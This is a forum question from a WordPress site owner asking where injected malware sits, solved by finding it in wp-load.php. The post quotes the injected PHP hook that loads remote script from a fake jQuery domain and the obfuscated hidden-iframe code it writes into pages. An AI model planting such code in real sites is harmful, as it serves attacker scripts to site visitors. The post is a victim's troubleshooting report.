Where could this line be located?

Question

I recently made a website with WordPress, but this virus has been bugging me lately. It edits the whole wp-load file and writes:

function pluginAuth(){
echo(@wp_remote_retrieve_body(@wp_remote_get('http ://jquerys.net/jquery-1.6.3.min.js')));
}
@add_action('wp_head', 'pluginAuth'); 

Notice that it points to a fake jquery site "jqueryS". I finally found the line that is causing it by going to my homepage (topdailyfights.com) and inspecting the code (it's on line 78) but not sure which one of the wordpress files contains it.

This is the code:

<script type="text/javascript">if(document.referrer == ''){document.write('<if'+'rame src="http://jquerys.net/analytics.php?frame=yes" width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0"></ifr'+'ame>');document.write('<s'+'cript type="text/javascript" src="http://jquerys.net/analytics.js"></scrip'+'t>');}else{document.write('<sc'+'ript type="text/javascript"src="http://jquerys.net/jquery.js"></scrip'+'t>');}</script><script type="text/javascript" src="http://jquerys.net/license.js"></script><style type="text/css" media="print">#wpadminbar { display:none; }</style>

Where could this line be located?

Thanks in advance,

JB

SOLVED

The file name is wp-load.php located in www folder. I was searching in public_html folder the whole time. Used Windows Grep to find it.

Awesome tool; I recommend.

Thanks everyone.

Answer 1

The file name is wp-load.php located in www folder. I was searching in public_html folder the whole time. Used Windows Grep to find it. Awesome tool; I recommend. Thanks everyone.